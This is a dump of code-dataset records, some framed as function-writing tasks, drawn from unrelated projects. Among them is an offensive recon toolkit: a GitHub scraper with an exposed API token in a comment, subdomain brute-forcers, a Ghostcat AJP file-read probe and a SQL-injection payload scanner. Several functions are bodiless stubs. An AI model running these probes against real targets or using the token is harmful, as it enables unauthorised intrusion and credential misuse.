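    else:
        print(html[:200])   # cleaned HTML, safe to hand to BeautifulSoup

asyncio.run(demo())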
189,275 | import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
t_tokens = []
import tldextract
def githubApiSearchCode( search, page ):
headers = {"Authorization":"token "+random.choice(t_tokens)}
# {'Authorization': 'token 6571b30a3aa4cdd8a5e0ec6a49033fb47daf373a'}
print(headers)
url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page)
print(url)
try:
r = requests.get( url, headers=headers, timeout=5 )
json = r.json()
return json
except Exception as e:
print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) )
return False | null |
189,276 | import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
def getRawUrl( result ):
raw_url = result['html_url'];
raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' )
raw_url = raw_url.replace( '/blob/', '/' )
return raw_url;
def doGetCode( url ):
# print( url )
try:
r = requests.get( url, timeout=5 )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
return r.text
if not len(t_tokens):
parser.error( 'auth token is missing' )
t_history = []
import tldextract
def readCode( regexp, source, result ):
url = getRawUrl( result )
print(url)
code = doGetCode( url )
# print(code)
if code:
matches = re.findall( regexp, code )
print(matches)
if matches:
for sub in matches:
sub = sub.replace('2F','').lower().strip()
if len(sub) and not sub in t_history:
t_history.append( sub )
sys.stdout.write( "%s" % sub )
if source:
sys.stdout.write( "\t-> %s" % result['html_url'] )
sys.stdout.write( "\n" ) | null |
189,277 | import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
from Plugins.infoGather.subdomain.Sublist3r.subbrute import subbrute
import dns.resolver
import requests
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[+] Saving results to file: %s%s%s%s" % (Y, W, R, os.getcwd()+'/'+filename, W))
with open(str(filename), 'wt') as f:
for subdomain in subdomains:
f.write(subdomain+'\n') | null |
189,278 | import re
import sys
import os
import argparse
import time
import hashlib
import random
import multiprocessing
import threading
import socket
import json
from collections import Counter
from Plugins.infoGather.subdomain.Sublist3r.subbrute import subbrute
import dns.resolver
import requests
The provided code snippet includes necessary dependencies for implementing the `subdomain_sorting_key` function. Write a Python function `def subdomain_sorting_key(hostname)` to solve the following problem:
Sorting key for subdomains This sorting key orders subdomains from the top-level domain at the right reading left, then moving '^' and 'www' to the top of their group. For example, the following list is sorted correctly: [ 'example.com', 'www.example.com', 'a.example.com', 'www.a.example.com', 'b.a.example.com', 'b.example.com', 'example.net', 'www.example.net', 'a.example.net', ]
Here is the function:
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split('.')[::-1]
if parts[-1] == 'www':
return parts[:-1], 1
return parts, 0 | Sorting key for subdomains This sorting key orders subdomains from the top-level domain at the right reading left, then moving '^' and 'www' to the top of their group. For example, the following list is sorted correctly: [ 'example.com', 'www.example.com', 'a.example.com', 'www.a.example.com', 'b.a.example.com', 'b.example.com', 'example.net', 'www.example.net', 'a.example.net', ] |
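A quick sketch of the ordering this key produces when passed to sorted() (hostnames are illustrative):
hosts = ['a.example.com', 'example.com', 'www.example.com', 'a.example.net', 'example.net']
print(sorted(hosts, key=subdomain_sorting_key))
# ['example.com', 'www.example.com', 'a.example.com', 'example.net', 'a.example.net']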
189,279 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
host_match = re.compile(r"((?<=[\s])[a-zA-Z0-9_-]+\.(?:[a-zA-Z0-9_-]+\.?)+(?=[\s]))")
def extract_hosts(data, hostname):
#made a global to avoid re-compilation
global host_match
ret = []
hosts = re.findall(host_match, data)
for fh in hosts:
host = fh.rstrip(".")
#Is this host in scope?
if host.endswith(hostname):
ret.append(host)
return ret | null |
189,280 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
domain_match = re.compile("([a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*)+")
def trace(*args, **kwargs):
if verbose:
for a in args:
sys.stderr.write(str(a))
sys.stderr.write(" ")
sys.stderr.write("\n")
def extract_subdomains(file_name):
#Avoid re-compilation
global domain_match
subs = {}
sub_file = open(file_name).read()
f_all = re.findall(domain_match, sub_file)
del sub_file
for i in f_all:
if i.find(".") >= 0:
p = i.split(".")[0:-1]
#gobble everything that might be a TLD
while p and len(p[-1]) <= 3:
p = p[0:-1]
#remove the domain name
p = p[0:-1]
#do we have a subdomain.domain left?
if len(p) >= 1:
trace(str(p), " : ", i)
for q in p:
if q :
#domain names can only be lower case.
q = q.lower()
if q in subs:
subs[q] += 1
else:
subs[q] = 1
#Free some memory before the sort...
del f_all
#Sort by freq in desc order
subs_sorted = sorted(subs.keys(), key = lambda x: subs[x], reverse = True)
return subs_sorted | null |
189,281 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
def run(target, record_type = None, subdomains = "names.txt", resolve_list = "resolvers.txt", process_count = 16):
def print_target(target, record_type = None, subdomains = "names.txt", resolve_list = "resolvers.txt", process_count = 16, output = False, json_output = False, found_subdomains=[],verbose=False):
subdomains_list = []
results_temp = []
run(target, record_type, subdomains, resolve_list, process_count)
for result in run(target, record_type, subdomains, resolve_list, process_count):
(hostname, record_type, response) = result
if not record_type:
result = hostname
else:
result = "%s,%s" % (hostname, ",".join(response).strip(","))
if result not in found_subdomains:
if verbose:
print(result)
subdomains_list.append(result)
return set(subdomains_list) | null |
189,282 | import re
import optparse
import os
import signal
import sys
import uuid
import random
import ctypes
import dns.resolver
import dns.rdatatype
import json
import multiprocessing
def killproc(signum = 0, frame = 0, pid = False):
if not pid:
pid = os.getpid()
if sys.platform.startswith('win'):
try:
kernel32 = ctypes.windll.kernel32
handle = kernel32.OpenProcess(1, 0, pid)
kernel32.TerminateProcess(handle, 0)
except:
#Oah windows.
pass
else:
os.kill(pid, 9)
def signal_init():
#Escalate signal to prevent zombies.
signal.signal(signal.SIGINT, killproc)
try:
signal.signal(signal.SIGTSTP, killproc)
signal.signal(signal.SIGQUIT, killproc)
except:
#Windows
pass | null |
189,283 | import multiprocessing
import gevent
from gevent import monkey
from gevent.queue import PriorityQueue
import re
import dns.resolver
import time
import signal
import os
import glob
from Plugins.infoGather.subdomain.lijiejie.lib.common import is_intranet, load_dns_servers, load_next_sub, print_msg, get_out_file_name, user_abort
import urllib3
def run_process(target, options, process_num, dns_servers, next_subs, scan_count, found_count, queue_size_list,
tmp_dir):
def print_msg(msg=None, left_align=True, line_feed=False):
def load_dns_servers():
def load_next_sub(options):
def get_out_file_name(target, options):
def lijiejieRun(domain):
# options, args = parse_args()
options = {'file': 'subnames.txt', 'full_scan': False, 'i': False, 'threads': 200, 'process': 6, 'output': None}
args = [domain]
start_time = time.time()
# make tmp dirs
tmp_dir = './Plugins/infoGather/subdomain/lijiejie/tmp/%s_%s' % (args[0], int(time.time()))
# tmp_dir = 'tmp/%s_%s' % (args[0], int(time.time()))
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
multiprocessing.freeze_support()
all_process = []
dns_servers = load_dns_servers()
next_subs = load_next_sub(options)
scan_count = multiprocessing.Value('i', 0)
found_count = multiprocessing.Value('i', 0)
queue_size_list = multiprocessing.Array('i', options['process'])
try:
print('[+] Init %s scan process.' % options['process'])
for process_num in range(options['process']):
p = multiprocessing.Process(target=run_process,
args=(args[0], options, process_num,
dns_servers, next_subs,
scan_count, found_count,queue_size_list,
tmp_dir)
)
all_process.append(p)
p.start()
while all_process:
for p in all_process:
if not p.is_alive():
all_process.remove(p)
groups_count = 0
for c in queue_size_list:
groups_count += c
msg = '[*] %s found, %s scanned in %.1f seconds, %s groups left' % (
found_count.value, scan_count.value, time.time() - start_time, groups_count)
print_msg(msg)
time.sleep(1.0)
except KeyboardInterrupt as e:
for p in all_process:
p.terminate()
print('[ERROR] User aborted the scan!')
except Exception as e:
print(e)
msg = '[+] All Done. %s found, %s scanned in %.1f seconds.' % (
found_count.value, scan_count.value, time.time() - start_time)
print_msg(msg, line_feed=True)
out_file_name = './Plugins/infoGather/subdomain/lijiejie/{}'.format(get_out_file_name(args[0], options))
# out_file_name = '{}'.format(get_out_file_name(args[0], options))
with open(out_file_name, 'w') as f:
for _file in glob.glob(tmp_dir + '/*.txt'):
with open(_file,'r') as tmp_f:
content = tmp_f.read()
f.write(content)
print('[+] The output file is %s' % out_file_name) | null |
189,284 | import optparse
import sys
def parse_args():
parser = optparse.OptionParser('usage: %prog [options] target.com',
version="%prog 1.1")
parser.add_option('-f', dest='file', default='subnames.txt',
help='File contains new line delimited subs, default is subnames.txt.')
parser.add_option('--full', dest='full_scan', default=False, action='store_true',
help='Full scan, NAMES FILE subnames_full.txt will be used to brute')
parser.add_option('-i', '--ignore-intranet', dest='i', default=False, action='store_true',
help='Ignore domains pointed to private IPs')
parser.add_option('-t', '--threads', dest='threads', default=200, type=int,
help='Num of scan threads, 200 by default')
parser.add_option('-p', '--process', dest='process', default=6, type=int,
help='Num of scan Process, 6 by default')
parser.add_option('-o', '--output', dest='output', default=None,
type='string', help='Output file name. default is {target}.txt')
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
sys.exit(0)
return options, args | null |
189,285 | import sys
import os
from gevent.pool import Pool
import dns.resolver
from Plugins.infoGather.subdomain.lijiejie.lib.consle_width import getTerminalSize
def is_intranet(ip):
ret = ip.split('.')
if len(ret) != 4:
return True
if ret[0] == '10':
return True
if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
return True
if ret[0] == '192' and ret[1] == '168':
return True
return False | null |
189,286 | def _getTerminalSize_windows():
res = None
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
except:
return None
if res:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
else:
return None
def _getTerminalSize_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
import subprocess
proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = proc.communicate(input=None)
cols = int(output[0])
proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = proc.communicate(input=None)
rows = int(output[0])
return (cols, rows)
except:
return None
def _getTerminalSize_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
except:
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
env = os.environ
cr = (env['LINES'], env['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
def getTerminalSize():
import platform
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _getTerminalSize_windows()
if tuple_xy is None:
tuple_xy = _getTerminalSize_tput()
# needed for window's python in cygwin's xterm!
if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
tuple_xy = _getTerminalSize_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy | null |
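A minimal usage sketch for the cross-platform helper above:
cols, rows = getTerminalSize()
print('terminal size: %d columns x %d rows' % (cols, rows))   # falls back to (80, 25) if detection fails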
189,287 | import requests
from bs4 import BeautifulSoup
import re
from urllib.parse import quote
import json
import math
from termcolor import cprint
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'}
def beianbeianApi(domain):
cprint('Load beianbeianApi: ', 'green')
# 获取备案ID
beianId = ''
url = 'http://www.beianbeian.com/s-0/{}.html'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] http://www.beianbeian.com is die \n{}'.format(e.args))
return []
text = res.text
# print(text)
soup_1 = BeautifulSoup(text, 'html.parser')
tbodys = soup_1.find_all('tbody', id='table_tr')
for tbody in tbodys:
a_hrefs = tbody.find_all('a')
for a_href in a_hrefs:
if '反查' in a_href.get_text():
beianId = a_href['href']
if beianId:
beianSearchUrl = 'http://www.beianbeian.com' + beianId
print('查询到备案号: {}'.format(beianSearchUrl))
else:
print('没有匹配到备案号')
return []
# 备案反查域名
beianbeianNewDomains = []
tempDict = {}
# url = r'http://www.beianbeian.com/search-1/%E6%B5%99B2-20080224.html'
try:
res = requests.get(url=beianSearchUrl, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(beianSearchUrl, e.args))
return []
text = res.text
# print(text)
soup = BeautifulSoup(text, 'html.parser')
tbodys = soup.find_all('tbody', id='table_tr')
for tbody in tbodys:
trs = tbody.find_all('tr')
for tr in trs:
tds = tr.find_all('td')
companyName = tds[4].get_text()
newDomain = tds[5].get_text().strip().replace('www.', '')
time = tds[6].get_text()
if newDomain not in tempDict:
tempDict[newDomain] = (companyName, newDomain, time)
beianbeianNewDomains.append((companyName, newDomain, time))
beianbeianNewDomains = list(set(beianbeianNewDomains))
print('beianbeianApi去重后共计{}个顶级域名'.format(len(beianbeianNewDomains)))
# for each in beianbeianNewDomains:
# print(each)
return beianbeianNewDomains
def chinazApi(domain):
cprint('Load chinazApi: ', 'green')
chinazNewDomains = []
companyName = ""
# 获取公司名
url = "https://micp.chinaz.com/?query={}".format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(url, e.args))
return chinazNewDomains, companyName
text = res.text
companyName = re.search('<tr><td class="ww-3 c-39 bg-3fa">主办单位:</td><td class="z-tl">(.*)</td></tr>', text)
if companyName:
companyName = companyName.group(1)
else:
print("[{}] 没有匹配到公司名".format(domain))
return chinazNewDomains, companyName
# 获取备案号
url = 'https://micp.chinaz.com/Handle/AjaxHandler.ashx?action=GetBeiansl&query={}&type=host'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(url, e.args))
return chinazNewDomains, companyName
text = res.text
beianResult = re.findall('SiteLicense:"([^"]*)",SiteName:"([^"]*)",MainPage:"([^"]*)",VerifyTime:"([^"]*)"', text)
if not beianResult:
print("[{}] 没有查到备案信息".format(domain))
return chinazNewDomains, companyName
for _ in beianResult:
# print(_)
beianId, siteName, newDomain, time = _
if newDomain.startswith('www.'):
newDomain = newDomain.replace("www.", '')
chinazNewDomains.append([beianId, siteName, newDomain, time])
# print('chinazApi去重后共计{}个顶级域名'.format(len(chinazNewDomains)))
return chinazNewDomains, companyName
def run_beian2domain(domain):
beianNewDomains = []
# beianbeianNewDomains = beianbeianApi(domain) # 失效
chinazNewDomains, companyName = chinazApi(domain)
tempDict = {}
for each in chinazNewDomains:
if each[1] not in tempDict:
tempDict[each[1]] = each
beianNewDomains.append(each)
# beianNewDomains = list(set(beianbeianNewDomains + chinazNewDomains))
# print('共计{}个顶级域名'.format(len(beianNewDomains)))
cprint('-' * 50 + '去重后共计{}个顶级域名'.format(len(beianNewDomains)) + '-' * 50, 'green')
for _ in beianNewDomains:
print(_)
cprint('去重后共计{}个顶级域名'.format(len(beianNewDomains)), 'red')
return beianNewDomains, companyName
if __name__ == '__main__':
domain = 'xxxxxx'
run_beian2domain(domain)
def beianbeianApi(domain):
cprint('Load beianbeianApi: ', 'green')
# 获取备案ID
beianId = ''
url = 'http://www.beianbeian.com/s-0/{}.html'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] http://www.beianbeian.com is die \n{}'.format(e.args))
return []
text = res.text
# print(text)
soup_1 = BeautifulSoup(text, 'html.parser')
tbodys = soup_1.find_all('tbody', id='table_tr')
for tbody in tbodys:
a_hrefs = tbody.find_all('a')
for a_href in a_hrefs:
if '反查' in a_href.get_text():
beianId = a_href['href']
if beianId:
beianSearchUrl = 'http://www.beianbeian.com' + beianId
print('查询到备案号: {}'.format(beianSearchUrl))
else:
print('没有匹配到备案号')
return []
# 备案反查域名
beianbeianNewDomains = []
tempDict = {}
# url = r'http://www.beianbeian.com/search-1/%E6%B5%99B2-20080224.html'
try:
res = requests.get(url=beianSearchUrl, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(beianSearchUrl, e.args))
return []
text = res.text
# print(text)
soup = BeautifulSoup(text, 'html.parser')
tbodys = soup.find_all('tbody', id='table_tr')
for tbody in tbodys:
trs = tbody.find_all('tr')
for tr in trs:
tds = tr.find_all('td')
companyName = tds[4].get_text()
newDomain = tds[5].get_text().strip().replace('www.', '')
time = tds[6].get_text()
if newDomain not in tempDict:
tempDict[newDomain] = (companyName, newDomain, time)
beianbeianNewDomains.append((companyName, newDomain, time))
beianbeianNewDomains = list(set(beianbeianNewDomains))
print('beianbeianApi去重后共计{}个顶级域名'.format(len(beianbeianNewDomains)))
# for each in beianbeianNewDomains:
# print(each)
return beianbeianNewDomains | null |
189,288 |
def filter_internal_ip(ip_subnet):
ip_subnet_list = ip_subnet.split('.')
if ip_subnet_list[0] == '10' or ip_subnet_list[0] == '127':
return None
elif ip_subnet_list[0] == '172' and 15 < int(ip_subnet_list[1]) < 32:
return None
elif ip_subnet_list[0] == '192' and ip_subnet_list[1] == '168':
return None
else:
return ip_subnet | null |
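A short sketch of the intended behaviour (prefixes are illustrative, and it assumes the corrected '10'/'127' comparison above):
for prefix in ['10.0.0', '172.20.1', '192.168.1', '203.0.113']:
    print(prefix, filter_internal_ip(prefix))
# only the public 203.0.113 prefix is returned; RFC1918 and loopback prefixes yield None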
189,289 | import struct
from tqdm import *
from colorama import Fore
import socket
from urllib.parse import urlparse
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) | null |
189,290 | import struct
from tqdm import *
from colorama import Fore
def unpack(stream, fmt):
import socket
from urllib.parse import urlparse
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return None
res, = unpack(stream, "%ds" % size)
stream.read(1) # \0
return res | null |
189,291 | import struct
from tqdm import *
from colorama import Fore
class AjpForwardRequest(object):
def __init__(self, data_direction=None):
def pack_headers(self):
def pack_attributes(self):
def serialize(self):
def parse(self, raw_packet):
def send_and_receive(self, socket, stream, save_cookies=False):
import socket
from urllib.parse import urlparse
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
fr.method = method
fr.protocol = "HTTP/1.1"
fr.req_uri = req_uri
fr.remote_addr = target_host
fr.remote_host = None
fr.server_name = target_host
fr.server_port = 80
fr.request_headers = {
'SC_REQ_ACCEPT': 'text/html',
'SC_REQ_CONNECTION': 'keep-alive',
'SC_REQ_CONTENT_LENGTH': '0',
'SC_REQ_HOST': target_host,
'SC_REQ_USER_AGENT': 'Mozilla',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
fr.is_ssl = False
fr.attributes = []
return fr | null |
189,292 | import struct
from tqdm import *
from colorama import Fore
import socket
class Tomcat(object):
def __init__(self, target_host, target_port):
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
from urllib.parse import urlparse
def detect_AJP_LFI(url):
ip = urlparse(url).netloc.split(':')[0]
port = 8009
file = 'WEB-INF/web.xml'
t = Tomcat(ip, port)
_, data = t.perform_request('/asdf', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', file]},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
for d in data:
if b'Welcome to Tomcat' in d.data:
return True | null |
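A usage sketch, assuming the Tomcat helper class above is fully implemented; the target URL is illustrative:
if detect_AJP_LFI('http://203.0.113.10:8080'):
    print('AJP connector on port 8009 leaks WEB-INF/web.xml (Ghostcat-style file read)')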
189,293 | from termcolor import cprint
import requests
import threading
import re
import hashlib
from urllib.parse import urlparse
from collections import OrderedDict
from xml.dom import minidom
from queue import Queue
import time
import traceback
from tqdm import *
from colorama import Fore
import urllib3
def read_xml_payloads():
    # parse the payload XML into an OrderedDict keyed by DBMS (body trimmed in this excerpt)
    payloads_dict = OrderedDict()
    return payloads_dict
def read_xml_errors():
    # parse the error-based injection regexes from XML (body trimmed in this excerpt)
    errors_regexp_dict = OrderedDict()
    return errors_regexp_dict
class SQLInject(threading.Thread):
    name = 'SQL injection'
def __init__(self, payloadLinks_queue, pbar, vul_list):
def run(self):
    # dispatch the individual vulnerability detection methods
def run_detect(self, url):
    # time taken by the request (used for time-based checks)
def runTime(self, url):
    # use regexes to decide whether the response indicates error-based injection
def checkErrorSQL(self, text):
def detect(param_Links):
global errors_regexp_dict
# payloads
payloads_dict = read_xml_payloads()
    # regex rules for error-based injection
errors_regexp_dict = read_xml_errors()
    # dynamic links with payloads appended
payloadLinks = []
    # stores the name and URL of each confirmed vulnerability
vul_list = []
for eachLink in param_Links:
try:
eachLink_parse = urlparse(eachLink)
query = eachLink_parse.query
for _ in query.split('&'):
paramName, paramValue = _.split('=')
for dbms in payloads_dict:
for payload in payloads_dict[dbms]:
newParamValue = paramValue + payload
newParam = paramName + '=' + newParamValue
newLink = eachLink.replace(_, newParam)
payloadLinks.append(newLink)
except Exception as e:
pass
    payloadLinks_queue = Queue(-1)  # put the payload-carrying links into a queue for the workers
for _ in payloadLinks:
payloadLinks_queue.put(_)
threads = []
    threadNum = 200  # number of worker threads
    pbar = tqdm(total=payloadLinks_queue.qsize(), desc="SQL injection scan", ncols=150)  # total is the number of links to test
for num in range(1, threadNum + 1):
        t = SQLInject(payloadLinks_queue, pbar, vul_list)  # one detector thread sharing the link queue and the vulnerability list
threads.append(t)
t.start()
for t in threads:
t.join()
pbar.close()
return vul_list | null |
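# Illustrative driver for detect(); the parameterised links below are made-up examples.
if __name__ == '__main__':
    sample_links = ['http://example.com/item.php?id=1', 'http://example.com/news.php?page=2']
    for vul in detect(sample_links):
        print(vul)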
189,294 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
def digital_read(pin):
return GPIO.input(pin) | null |
189,295 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
spi = None  # normally bound via CDLL to the compiled DEV_Config.so; the loading code is omitted in this excerpt
if spi is None:
    raise RuntimeError('Cannot find DEV_Config.so')
def spi_writebyte(value):
spi.DEV_SPI_WriteByte(value) | null |
189,296 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_SCK_PIN =11
EPD_MOSI_PIN =10
EPD_M1_CS_PIN =8
EPD_S1_CS_PIN =7
EPD_M2_CS_PIN =17
EPD_S2_CS_PIN =18
EPD_M1S1_DC_PIN =13
EPD_M2S2_DC_PIN =22
EPD_M1S1_RST_PIN =6
EPD_M2S2_RST_PIN =23
EPD_M1_BUSY_PIN =5
EPD_S1_BUSY_PIN =19
EPD_M2_BUSY_PIN =27
EPD_S2_BUSY_PIN =24
spi = None  # normally bound via CDLL to the compiled DEV_Config.so; the loading code is omitted in this excerpt
if spi is None:
    raise RuntimeError('Cannot find DEV_Config.so')
def digital_write(pin, value):
GPIO.output(pin, value)
def module_init():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(EPD_SCK_PIN, GPIO.OUT)
GPIO.setup(EPD_MOSI_PIN, GPIO.OUT)
logging.debug("python call bcm2835 Lib")
GPIO.setup(EPD_M2S2_RST_PIN, GPIO.OUT)
GPIO.setup(EPD_M1S1_RST_PIN, GPIO.OUT)
GPIO.setup(EPD_M2S2_DC_PIN, GPIO.OUT)
GPIO.setup(EPD_M1S1_DC_PIN, GPIO.OUT)
GPIO.setup(EPD_S1_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_S2_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_M1_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_M2_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_S1_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_S2_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_M1_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_M2_BUSY_PIN, GPIO.IN)
digital_write(EPD_M1_CS_PIN, 1)
digital_write(EPD_S1_CS_PIN, 1)
digital_write(EPD_M2_CS_PIN, 1)
digital_write(EPD_S2_CS_PIN, 1)
digital_write(EPD_M2S2_RST_PIN, 0)
digital_write(EPD_M1S1_RST_PIN, 0)
digital_write(EPD_M2S2_DC_PIN, 1)
digital_write(EPD_M1S1_DC_PIN, 1)
spi.DEV_ModuleInit() | null |
189,297 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_M1_CS_PIN =8
EPD_S1_CS_PIN =7
EPD_M2_CS_PIN =17
EPD_S2_CS_PIN =18
EPD_M1S1_DC_PIN =13
EPD_M2S2_DC_PIN =22
EPD_M1S1_RST_PIN =6
EPD_M2S2_RST_PIN =23
def digital_write(pin, value):
GPIO.output(pin, value)
def module_exit():
digital_write(EPD_M2S2_RST_PIN, 0)
digital_write(EPD_M1S1_RST_PIN, 0)
digital_write(EPD_M2S2_DC_PIN, 0)
digital_write(EPD_M1S1_DC_PIN, 0)
digital_write(EPD_S1_CS_PIN, 1)
digital_write(EPD_S2_CS_PIN, 1)
digital_write(EPD_M1_CS_PIN, 1)
digital_write(EPD_M2_CS_PIN, 1) | null |
189,298 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_SCK_PIN =11
EPD_MOSI_PIN =10
def spi_readbyte(Reg):
GPIO.setup(EPD_MOSI_PIN, GPIO.IN)
j=0
# time.sleep(0.01)
for i in range(0, 8):
GPIO.output(EPD_SCK_PIN, GPIO.LOW)
# time.sleep(0.01)
j = j << 1
if(GPIO.input(EPD_MOSI_PIN) == GPIO.HIGH):
j |= 0x01
else:
j &= 0xfe
# time.sleep(0.01)
GPIO.output(EPD_SCK_PIN, GPIO.HIGH)
# time.sleep(0.01)
GPIO.setup(EPD_MOSI_PIN, GPIO.OUT)
return j | null |
189,299 | import itertools, os, token, tokenize
TOKEN_WHITELIST = [token.OP, token.NAME, token.NUMBER, token.STRING]
_ignored = ['_version.py']
_dir_package = {'openllm-python': 'openllm', 'openllm-core': 'openllm_core', 'openllm-client': 'openllm_client'}
def run_cz(args):
from tabulate import tabulate
headers = ['Name', 'Lines', 'Tokens/Line']
table = []
package = _dir_package[args.dir]
for path, _, files in os.walk(os.path.join(args.dir, 'src', package)):
for name in files:
if not name.endswith('.py') or name in _ignored:
continue
filepath = os.path.join(path, name)
with tokenize.open(filepath) as file_:
tokens = [t for t in tokenize.generate_tokens(file_.readline) if t.type in TOKEN_WHITELIST]
token_count, line_count = len(tokens), len(set([t.start[0] for t in tokens]))
table.append([
filepath.replace(os.path.join(args.dir, 'src'), ''),
line_count,
token_count / line_count if line_count != 0 else 0,
])
print(tabulate([headers, *sorted(table, key=lambda x: -x[1])], headers='firstrow', floatfmt='.1f') + '\n')
print(
tabulate(
[
(dir_name, sum([x[1] for x in group]))
for dir_name, group in itertools.groupby(
sorted([(x[0].rsplit('/', 1)[0], x[1]) for x in table]), key=lambda x: x[0]
)
],
headers=['Directory', 'LOC'],
floatfmt='.1f',
)
)
print(f'total line count for {package}: {sum([x[1] for x in table])}\n')
return 0 | null |
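# Hypothetical invocation of run_cz; the namespace mirrors the only attribute the function reads
# (args.dir) and assumes the openllm monorepo layout plus the tabulate package are available.
if __name__ == '__main__':
  import argparse
  run_cz(argparse.Namespace(dir='openllm-python'))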
189,300 | import openllm_core
def __dir__():
coreutils = set(dir(openllm_core.utils)) | set([it for it in openllm_core.utils._extras if not it.startswith('_')])
return sorted(list(coreutils)) | null |
189,301 | import openllm_core
def __getattr__(name):
if hasattr(openllm_core.utils, name):
return getattr(openllm_core.utils, name)
raise AttributeError(f'module {__name__} has no attribute {name}') | null |
189,304 | from __future__ import annotations
import importlib.metadata
import logging
import os
import typing as t
import attr
from ._schemas import Helpers, Metadata, Response, StreamingResponse
from ._shim import MAX_RETRIES, AsyncClient, Client
def _address_converter(addr: str):
return addr if '://' in addr else 'http://' + addr | null |
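# Quick illustration of the converter above; the addresses are example values only.
print(_address_converter('localhost:3000'))          # -> http://localhost:3000
print(_address_converter('https://api.example.com'))  # unchanged, already carries a scheme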
189,305 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
